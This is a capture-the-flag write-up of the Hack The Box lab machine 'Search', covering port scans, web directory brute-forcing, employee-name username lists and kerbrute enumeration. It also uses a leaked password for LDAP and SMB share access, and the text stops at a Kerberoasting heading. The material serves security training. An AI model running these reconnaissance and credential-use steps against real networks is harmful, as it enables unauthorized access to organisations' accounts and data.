Search

Completed on April 23, 2022.

Overview

Hopefully you like this machine as much as I did. When I worked on it, I was getting ready to start working on the OSCP training (PEN-200), and was looking for practice before starting. At this point, I had finished the eCPPT almost a month ago. As with almost all HTB machines, this one goes a bit overboard, so it is definitely good practice in my opinion. It requires thorough enumeration more than the techniques used to pwn the system. The references I share below should help with understanding what is involved.

References

Enumeration

As we need to know what is available to us, we need to enumerate the exposed services to get some initial information and then dig deeper. Let's start by finding open ports…

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ sudo nmap -Pn -sS -p- --min-rate=1000 -T4 search.htb -oN Search_openPorts.log -oX Search_openPorts.xml
[sudo] password for jxberrios: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-19 22:07 EDT
Nmap scan report for search.htb (10.129.96.123)
Host is up (0.041s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
8172/tcp  open  unknown
9389/tcp  open  adws
49666/tcp open  unknown
49693/tcp open  unknown
49694/tcp open  unknown
49710/tcp open  unknown
49724/tcp open  unknown
49754/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 124.97 seconds
                                                                                   

…followed by further port scanning:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ PORTS=$(cat Search_openPorts.log | grep -E 'tcp.*open' | cut -d '/' -f 1 | xargs | sed -e 's/ /,/g')
                                                                                   
┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ sudo nmap -Pn -sS -sC -sV -p $PORTS --min-rate=1000 -T4 search.htb -oN Search_PortScan.log -oX Search_PortScan.xml
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-19 22:21 EDT
Nmap scan report for search.htb (10.129.96.123)
Host is up (0.040s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Search — Just Testing IIS
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-20 02:20:43Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
| http-methods: 
|_  Potentially risky methods: TRACE
| tls-alpn: 
|_  http/1.1
|_http-title: Search — Just Testing IIS
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
8172/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2022-04-20T02:22:12+00:00; -1m23s from scanner time.
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after:  2030-04-05T09:05:25
|_http-title: Site doesn't have a title.
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49693/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49694/tcp open  msrpc         Microsoft Windows RPC
49710/tcp open  msrpc         Microsoft Windows RPC
49724/tcp open  msrpc         Microsoft Windows RPC
49754/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-04-20T02:21:36
|_  start_date: N/A
|_clock-skew: mean: -1m23s, deviation: 0s, median: -1m23s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.96 seconds
                                                                                   

From the port scan we have a lot of good information to start with. What we know so far is:

  • Domain: search.htb

  • Common Name (from the TLS certificates): research

Enumerating HTTP/HTTPS

Inspecting TCP80 leads to a static page and references to jpg files:

Doing the same on TCP443 leads to the same page but there is a certificate bound to the service and the hostname research.search.htb associated with the certificate. This is the hostname related to the common name found in some services:

Note: Adding the CN research.search.htb to the hosts file.

As both http and https sites reference the same application, we find some “employees” that might come in handy:

To be clear, exposing a web application over HTTP when it is supposed to be served over HTTPS is something that should not be done, for security reasons. Pull the list of employees so we can then build username combinations:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ curl -sLkX GET --url "http://search.htb/#team-section" | grep -E '.*<h3>.*<\/h3>' | head -n 8 | tr -s ' ' | sed 's/^\s//' | sed 's/[/<>h3]//g'
Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Tompson
Cris Stewart

With these names we can build a list of common usernames based on typical naming conventions. See below if desired.

Username Combination
  • KLyons

  • DSantiago

  • SFrye

  • KStewart

  • KSpencer

  • DSimpson

  • BTompson

  • CStewart

  • K.Lyons

  • D.Santiago

  • S.Frye

  • K.Stewart

  • K.Spencer

  • D.Simpson

  • B.Tompson

  • C.Stewart

  • Keely.Lyons

  • Dax.Santiago

  • Sierra.Frye

  • Kyla.Stewart

  • Kaiara.Spencer

  • Dave.Simpson

  • Ben.Tompson

  • Cris.Stewart
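The list above can be generated rather than typed. This is an added example, not code from the original post: it takes the eight names the curl pipeline returned and emits the three conventions the post uses (FLast, F.Last, First.Last), grouped by pattern and de-duplicated case-insensitively, since AD logon names are not case-sensitive. The `lowercase` option and the `write_wordlist` helper are my additions.

```python
# Added example (not from the original walkthrough): build username candidates
# from scraped employee names in the three conventions listed in the post.

# Names as returned by the curl pipeline against the team section of the site.
EMPLOYEES = [
    "Keely Lyons", "Dax Santiago", "Sierra Frye", "Kyla Stewart",
    "Kaiara Spencer", "Dave Simpson", "Ben Tompson", "Cris Stewart",
]

# (label, formatter) pairs, in the order the post lists them.
PATTERNS = [
    ("FLast", lambda first, last: first[0] + last),
    ("F.Last", lambda first, last: first[0] + "." + last),
    ("First.Last", lambda first, last: first + "." + last),
]


def split_name(full_name):
    """Return (first, last). Multi-word surnames are joined without spaces."""
    parts = full_name.split()
    if len(parts) < 2:
        raise ValueError("expected 'First Last': %r" % full_name)
    return parts[0], "".join(parts[1:])


def build_wordlist(names, patterns=PATTERNS, lowercase=False):
    """Candidates grouped by pattern (as in the post), de-duplicated
    case-insensitively because Active Directory logon names ignore case."""
    seen, out = set(), []
    for _label, fmt in patterns:
        for name in names:
            first, last = split_name(name)
            candidate = fmt(first, last)
            if lowercase:
                candidate = candidate.lower()
            if candidate.lower() not in seen:
                seen.add(candidate.lower())
                out.append(candidate)
    return out


def write_wordlist(path, names, **kwargs):
    """Write one candidate per line (the format kerbrute userenum reads)."""
    words = build_wordlist(names, **kwargs)
    with open(path, "w") as fh:
        fh.write("\n".join(words) + "\n")
    return len(words)


if __name__ == "__main__":
    print("\n".join(build_wordlist(EMPLOYEES)))
```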

As part of our enumeration on HTTP/HTTPS, let's enumerate directories:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ dirb http://research.search.htb/ /opt/seclists/Discovery/Web-Content/common.txt -t -l -N 401,403,404 -w -f

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Apr 22 19:27:21 2022
URL_BASE: http://research.search.htb/
WORDLIST_FILES: /opt/seclists/Discovery/Web-Content/common.txt
OPTION: Fine tunning of NOT_FOUND detection
OPTION: Printing LOCATION header
OPTION: Ignoring NOT_FOUND code -> 401
OPTION: NOT forcing an ending '/' on URLs
OPTION: Not Stopping on warning messages

-----------------

GENERATED WORDS: 4710                                                          

---- Scanning URL: http://research.search.htb/ ----
==> DIRECTORY: http://research.search.htb/Images/                                 
==> DIRECTORY: http://research.search.htb/certenroll/                             
==> DIRECTORY: http://research.search.htb/css/                                    
==> DIRECTORY: http://research.search.htb/fonts/                                  
==> DIRECTORY: http://research.search.htb/images/                                 
+ http://research.search.htb/index.html (CODE:200|SIZE:2968)                      
==> DIRECTORY: http://research.search.htb/js/                                     
+ http://research.search.htb/staff (CODE:403|SIZE:1233)                           
                                                                                  
---- Entering directory: http://research.search.htb/Images/ ----
                                                                                  
---- Entering directory: http://research.search.htb/certenroll/ ----
                                                                                  
---- Entering directory: http://research.search.htb/css/ ----
                                                                                  
---- Entering directory: http://research.search.htb/fonts/ ----
                                                                                  
---- Entering directory: http://research.search.htb/images/ ----
                                                                                  
---- Entering directory: http://research.search.htb/js/ ----
                                                                                  
-----------------
END_TIME: Fri Apr 22 19:54:26 2022
DOWNLOADED: 32970 - FOUND: 2

From the directory/page enumeration, it is worth noting there is a 'certificate enrollment' directory (certenroll); most probably this is a user certificate enrollment service, but at the moment the key question is what it is for. While inspecting thoroughly, we found a picture with some notes, and when we inspected the notes they had a message giving out a clue:

This looks suspicious enough to look into this user and what seems to be their password. Given the naming convention first.last, we can compose it as:

  • Hope Sharp -> hope.sharp

  • Password: 'IsolationIsKey?'

Enumerating LDAP

Regardless of having some potential credentials, if we are doing an assessment we should still try to enumerate LDAP without credentials; even when the service demands authentication, some useful information can still be retrieved.

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ ldapsearch -x -H ldap://search.htb:389 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=search,DC=htb
namingcontexts: CN=Configuration,DC=search,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=search,DC=htb
namingcontexts: DC=DomainDnsZones,DC=search,DC=htb
namingcontexts: DC=ForestDnsZones,DC=search,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ ldapsearch -x -H ldap://search.htb:389 -b "DC=search,DC=htb" -s one       
# extended LDIF
#
# LDAPv3
# base <DC=search,DC=htb> with scope oneLevel
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1

We can retrieve the naming contexts, but anything else requires authentication. Use ldapsearch with the Users container as the base object to test the credentials:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ ldapsearch -x -H ldap://search.htb:389 -D 'SEARCH\hope.sharp' -w 'IsolationIsKey?' -b 'CN=Users,DC=search,DC=htb' 'objectClass=user'   
# extended LDIF
#
# LDAPv3
# base <CN=Users,DC=search,DC=htb> with scope subtree
# filter: objectClass=user
# requesting: ALL
#

# Administrator, Users, search.htb
dn: CN=Administrator,CN=Users,DC=search,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Administrator
description: Built-in account for administering the computer/domain
userCertificate:: MIIF2jCCBMKgAwIBAgITVAAAAAVaQrAT7+sADQAAAAAABTANBgkqhkiG9w0B
userCertificate:: MIIF2jCCBMKgAwIBAgITVAAAAAS4VoSkRjxsHQAAAAAABDANBgkqhkiG9w0B
distinguishedName: CN=Administrator,CN=Users,DC=search,DC=htb
instanceType: 4
whenCreated: 20200331141835.0Z
whenChanged: 20220413105646.0Z
uSNCreated: 8196
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
memberOf: CN=Domain Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Enterprise Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Schema Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Administrators,CN=Builtin,DC=search,DC=htb
uSNChanged: 213062
name: Administrator
objectGUID:: pc4v2f1XX0OmXLqrv/Edgw==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132943234160414333
lastLogoff: 0
lastLogon: 132951144927723973
pwdLastSet: 132313451094143670
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1v9AEAAA==
adminCount: 1
accountExpires: 9223372036854775807
logonCount: 866
sAMAccountName: Administrator
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=search,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20200407065434.0Z
dSCorePropagationData: 20200331143446.0Z
dSCorePropagationData: 20200331143446.0Z
dSCorePropagationData: 20200331141936.0Z
dSCorePropagationData: 16010714042016.0Z
lastLogonTimestamp: 132943210066516943
msDS-SupportedEncryptionTypes: 0

# Guest, Users, search.htb
dn: CN=Guest,CN=Users,DC=search,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Guest
description: Built-in account for guest access to the computer/domain
distinguishedName: CN=Guest,CN=Users,DC=search,DC=htb
instanceType: 4
whenCreated: 20200331141835.0Z
whenChanged: 20200331141835.0Z
uSNCreated: 8197
memberOf: CN=Guests,CN=Builtin,DC=search,DC=htb
uSNChanged: 8197
name: Guest
objectGUID:: ulsgEdc6F0mO1JMHdczXCA==
userAccountControl: 66082
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 0
primaryGroupID: 514
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1v9QEAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: Guest
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=search,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20200407065434.0Z
dSCorePropagationData: 20200331141936.0Z
dSCorePropagationData: 16010101000417.0Z

# krbtgt, Users, search.htb
dn: CN=krbtgt,CN=Users,DC=search,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: krbtgt
description: Key Distribution Center Service Account
distinguishedName: CN=krbtgt,CN=Users,DC=search,DC=htb
instanceType: 4
whenCreated: 20200331141936.0Z
whenChanged: 20211214201649.0Z
uSNCreated: 12324
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=search,DC=htb
uSNChanged: 180281
showInAdvancedViewOnly: TRUE
name: krbtgt
objectGUID:: aZ2LlY6VY0igOk+ajvf3mg==
userAccountControl: 66050
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132301379764357878
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1v9gEAAA==
adminCount: 1
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: krbtgt
sAMAccountType: 805306368
servicePrincipalName: kadmin/changepw
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=search,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20200407065434.0Z
dSCorePropagationData: 20200331143446.0Z
dSCorePropagationData: 20200331141936.0Z
dSCorePropagationData: 16010101181216.0Z
msDS-SupportedEncryptionTypes: 0

# Tristan Davies, Users, search.htb
dn: CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Tristan Davies
sn: Davies
description: The only Domain Admin allowed, Administrator will soon be disable
 d
givenName: Tristan
distinguishedName: CN=Tristan Davies,CN=Users,DC=search,DC=htb
instanceType: 4
whenCreated: 20200408163602.0Z
whenChanged: 20220422144632.0Z
displayName: Tristan Davies
uSNCreated: 24817
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=search,DC=htb
memberOf: CN=Domain Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Enterprise Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Schema Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Administrators,CN=Builtin,DC=search,DC=htb
uSNChanged: 253025
name: Tristan Davies
objectGUID:: BG7UG1fgykOF22w51h8LBw==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132406600358324634
lastLogoff: 0
lastLogon: 132406781797503096
pwdLastSet: 132427526509705890
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1vEgUAAA==
adminCount: 1
accountExpires: 9223372036854775807
logonCount: 4
sAMAccountName: Tristan.Davies
sAMAccountType: 805306368
userPrincipalName: Tristan.Davies@search.htb
lockoutTime: 0
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=search,DC=htb
dSCorePropagationData: 20220422152132.0Z
dSCorePropagationData: 20220422151632.0Z
dSCorePropagationData: 20220422151132.0Z
dSCorePropagationData: 20220422150632.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132416141844196476

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 4

Along with some users, we can see that the Administrator entry carries userCertificate attributes, and that Tristan.Davies sits in the same privileged groups as Administrator.
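Reading LDIF like the output above by eye gets old quickly. As an added example (not part of the original post), here is a small parser for ldapsearch output: it unfolds LDIF continuation lines (note how the description of Tristan Davies wraps onto a line containing only " d"), then reports each account's sAMAccountName, privileged group memberships and decoded userAccountControl bits (66048 and 66082 are the values shown above). The LDIF sample inside is constructed from trimmed copies of two entries above.

```python
# Added example (not from the original walkthrough): parse ldapsearch LDIF
# output into per-account findings useful for an AD review.
import re

# Constructed sample, trimmed from the ldapsearch output above. The folded
# 'description' value is kept exactly as LDIF wraps long lines.
SAMPLE_LDIF = """\
# extended LDIF
#
# Tristan Davies, Users, search.htb
dn: CN=Tristan Davies,CN=Users,DC=search,DC=htb
objectClass: user
cn: Tristan Davies
description: The only Domain Admin allowed, Administrator will soon be disable
 d
memberOf: CN=Domain Admins,CN=Users,DC=search,DC=htb
memberOf: CN=Schema Admins,CN=Users,DC=search,DC=htb
userAccountControl: 66048
sAMAccountName: Tristan.Davies
objectSid:: AQUAAAAAAAUVAAAAtaYuEIEY/l8B9o1vEgUAAA==

# Guest, Users, search.htb
dn: CN=Guest,CN=Users,DC=search,DC=htb
objectClass: user
cn: Guest
memberOf: CN=Guests,CN=Builtin,DC=search,DC=htb
userAccountControl: 66082
sAMAccountName: Guest

# search result
search: 2
result: 0 Success
"""

# Subset of userAccountControl bits (documented Microsoft values).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins",
                     "Administrators", "Group Policy Creator Owners"}

ATTR_RE = re.compile(r"^([A-Za-z][\w;-]*)(::?) ?(.*)$")


def unfold(text):
    """Join LDIF continuation lines (leading single space) onto the previous line."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text):
    """Return entries as dicts attribute -> list of values.
    Base64 values ('::') are kept encoded but prefixed with 'b64:'."""
    entries, current = [], {}
    for line in unfold(text):
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        m = ATTR_RE.match(line)
        if not m:
            continue
        attr, sep, value = m.groups()
        current.setdefault(attr, []).append(("b64:" if sep == "::" else "") + value)
    if current:
        entries.append(current)
    return [e for e in entries if "dn" in e]  # drops the trailing result block


def decode_uac(value):
    v = int(value)
    return [name for bit, name in sorted(UAC_FLAGS.items()) if v & bit]


def cn_of(dn):
    return dn.split(",")[0].split("=", 1)[1]


def summarize(text):
    """One row per account: logon name, privileged groups, UAC flags, description."""
    rows = []
    for e in parse_ldif(text):
        groups = {cn_of(g) for g in e.get("memberOf", [])}
        rows.append({
            "sam": e.get("sAMAccountName", [""])[0],
            "privileged": sorted(groups & PRIVILEGED_GROUPS),
            "uac": decode_uac(e.get("userAccountControl", ["0"])[0]),
            "description": e.get("description", [""])[0],
        })
    return rows


if __name__ == "__main__":
    for row in summarize(SAMPLE_LDIF):
        print(row)
```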

Using Kerbrute and Enum4linux

Using the username list we created from the people found on the web application, we can try and confirm if those are valid users.

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ kerbrute userenum --dc search.htb -d search.htb usernames.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 04/21/22 - Ronnie Flathers @ropnop

2022/04/21 00:55:41 >  Using KDC(s):
2022/04/21 00:55:41 >  	search.htb:88

2022/04/21 00:55:41 >  [+] VALID USERNAME:	 Keely.Lyons@search.htb
2022/04/21 00:55:41 >  [+] VALID USERNAME:	 Sierra.Frye@search.htb
2022/04/21 00:55:41 >  [+] VALID USERNAME:	 Dax.Santiago@search.htb
2022/04/21 00:55:42 >  Done! Tested 24 usernames (3 valid) in 0.374 seconds
                                                                                   
                                                                                   

This gave us three AD accounts that exist. By using enum4linux, we found some interesting group memberships and other users retrieved through LDAP:

Group: 'Schema Admins' (RID: 518) has member: SEARCH\Administrator
Group: 'Schema Admins' (RID: 518) has member: SEARCH\Tristan.Davies
Group: 'Domain Admins' (RID: 512) has member: SEARCH\Administrator
Group: 'Domain Admins' (RID: 512) has member: SEARCH\Tristan.Davies
Group: 'Group Policy Creator Owners' (RID: 520) has member: SEARCH\Administrator
Group: 'Group Policy Creator Owners' (RID: 520) has member: SEARCH\Tristan.Davies

At this point, we could pull more valuable information using Bloodhound, which might save us some effort, but we can leave that for a later stage and go through the process manually.

Gaining Access

Looking specifically at the shares the hope.sharp account has access to:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbmap -H search.htb -u 'hope.sharp' -p 'IsolationIsKey?' -d SEARCH 
[+] IP: search.htb:445	Name: unknown                                           
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	CertEnroll                                        	READ ONLY	Active Directory Certificate Services share
	helpdesk                                          	NO ACCESS	
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	RedirectedFolders$                                	READ, WRITE	
	SYSVOL                                            	READ ONLY	Logon server share 

There we see a share that can be accessed with this credential. Let's take a look:

┌──(jxberrios 👿 back0ff)-[~/…/Search]
└─$ smbclient //search.htb/RedirectedFolders$ -U 'SEARCH\hope.sharp'%'IsolationIsKey?'
Try "help" to get a list of possible commands.
smb: \> recurse 
smb: \> ls
  .                                  Dc        0  Fri Apr 22 11:47:28 2022
  ..                                 Dc        0  Fri Apr 22 11:47:28 2022
  abril.suarez                       Dc        0  Tue Apr  7 14:12:58 2020
  Angie.Duffy                        Dc        0  Fri Jul 31 09:11:32 2020
  Antony.Russo                       Dc        0  Fri Jul 31 08:35:32 2020
  belen.compton                      Dc        0  Tue Apr  7 14:32:31 2020
  Cameron.Melendez                   Dc        0  Fri Jul 31 08:37:36 2020
  chanel.bell                        Dc        0  Tue Apr  7 14:15:09 2020
  Claudia.Pugh                       Dc        0  Fri Jul 31 09:09:08 2020
  Cortez.Hickman                     Dc        0  Fri Jul 31 08:02:04 2020
  dax.santiago                       Dc        0  Tue Apr  7 14:20:08 2020
  Eddie.Stevens                      Dc        0  Fri Jul 31 07:55:34 2020
  edgar.jacobs                       Dc        0  Thu Apr  9 16:04:11 2020
  Edith.Walls                        Dc        0  Fri Jul 31 08:39:50 2020
  eve.galvan                         Dc        0  Tue Apr  7 14:23:13 2020
  frederick.cuevas                   Dc        0  Tue Apr  7 14:29:22 2020
  hope.sharp                         Dc        0  Thu Apr  9 10:34:41 2020
  jayla.roberts                      Dc        0  Tue Apr  7 14:07:00 2020
  Jordan.Gregory                     Dc        0  Fri Jul 31 09:01:06 2020
  payton.harmon                      Dc        0  Thu Apr  9 16:11:39 2020
  Reginald.Morton                    Dc        0  Fri Jul 31 07:44:32 2020
  santino.benjamin                   Dc        0  Tue Apr  7 14:10:25 2020
  Savanah.Velazquez                  Dc        0  Fri Jul 31 08:21:42 2020
  sierra.frye                        Dc        0  Wed Nov 17 20:01:46 2021
  trace.ryan                         Dc        0  Thu Apr  9 16:14:26 2020

\abril.suarez
  .                                  Dc        0  Tue Apr  7 14:12:58 2020
  ..                                 Dc        0  Tue Apr  7 14:12:58 2020
  Desktop                           DRc        0  Fri Jul 31 08:19:29 2020
  Documents                         DRc        0  Fri Jul 31 08:19:33 2020
  Downloads                         DRc        0  Fri Jul 31 08:19:30 2020

...

\frederick.cuevas\Downloads
NT_STATUS_ACCESS_DENIED listing \frederick.cuevas\Downloads\*

\hope.sharp\Desktop
  .                                 DRc        0  Thu Apr  9 10:35:49 2020
  ..                                DRc        0  Thu Apr  9 10:35:49 2020
  $RECYCLE.BIN                     DHSc        0  Thu Apr  9 10:35:49 2020
  desktop.ini                      AHSc      282  Thu Apr  9 10:35:00 2020
  Microsoft Edge.lnk                 Ac     1450  Thu Apr  9 10:35:38 2020

\hope.sharp\Documents
  .                                 DRc        0  Thu Apr  9 10:35:50 2020
  ..                                DRc        0  Thu Apr  9 10:35:50 2020
  $RECYCLE.BIN                     DHSc        0  Thu Apr  9 10:35:51 2020
  desktop.ini                      AHSc      402  Thu Apr  9 10:35:03 2020

\hope.sharp\Downloads
  .                                 DRc        0  Thu Apr  9 10:35:49 2020
  ..                                DRc        0  Thu Apr  9 10:35:49 2020
  $RECYCLE.BIN                     DHSc        0  Thu Apr  9 10:35:49 2020
  desktop.ini                      AHSc      282  Thu Apr  9 10:35:02 2020

\jayla.roberts\Desktop
NT_STATUS_ACCESS_DENIED listing \jayla.roberts\Desktop\*

...

\Savanah.Velazquez\Downloads
NT_STATUS_ACCESS_DENIED listing \Savanah.Velazquez\Downloads\*

\sierra.frye\Desktop
  .                                 DRc        0  Wed Nov 17 20:08:00 2021
  ..                                DRc        0  Wed Nov 17 20:08:00 2021
  $RECYCLE.BIN                     DHSc        0  Tue Apr  7 14:03:59 2020
  desktop.ini                      AHSc      282  Fri Jul 31 10:42:15 2020
  Microsoft Edge.lnk                 Ac     1450  Tue Apr  7 08:28:05 2020
  user.txt                           Ac       33  Wed Nov 17 19:55:27 2021

\sierra.frye\Documents
NT_STATUS_ACCESS_DENIED listing \sierra.frye\Documents\*

\sierra.frye\Downloads
NT_STATUS_ACCESS_DENIED listing \sierra.frye\Downloads\*

\trace.ryan\Desktop
NT_STATUS_ACCESS_DENIED listing \trace.ryan\Desktop\*

\trace.ryan\Documents
NT_STATUS_ACCESS_DENIED listing \trace.ryan\Documents\*

\trace.ryan\Downloads
NT_STATUS_ACCESS_DENIED listing \trace.ryan\Downloads\*

\hope.sharp\Desktop\$RECYCLE.BIN
  .                                DHSc        0  Thu Apr  9 10:35:49 2020
  ..                               DHSc        0  Thu Apr  9 10:35:49 2020
  desktop.ini                      AHSc      129  Thu Apr  9 10:35:49 2020

\hope.sharp\Documents\$RECYCLE.BIN
  .                                DHSc        0  Thu Apr  9 10:35:51 2020
  ..                               DHSc        0  Thu Apr  9 10:35:51 2020
  desktop.ini                      AHSc      129  Thu Apr  9 10:35:51 2020

\hope.sharp\Downloads\$RECYCLE.BIN
  .                                DHSc        0  Thu Apr  9 10:35:49 2020
  ..                               DHSc        0  Thu Apr  9 10:35:49 2020
  desktop.ini                      AHSc      129  Thu Apr  9 10:35:50 2020

\sierra.frye\Desktop\$RECYCLE.BIN
  .                                DHSc        0  Tue Apr  7 14:03:59 2020
  ..                               DHSc        0  Tue Apr  7 14:03:59 2020
  desktop.ini                      AHSc      129  Tue Apr  7 14:04:00 2020
smb: \> get sierra.frye\Desktop\user.txt
NT_STATUS_ACCESS_DENIED opening remote file \sierra.frye\Desktop\user.txt

All of this leads nowhere, except that we now know ‘sierra.frye’ has the user flag, so this user is probably the next step for lateral movement.

Kerberoasting

Given the user list we got from enum4linux, let's use it to request SPN tickets (Kerberoasting):

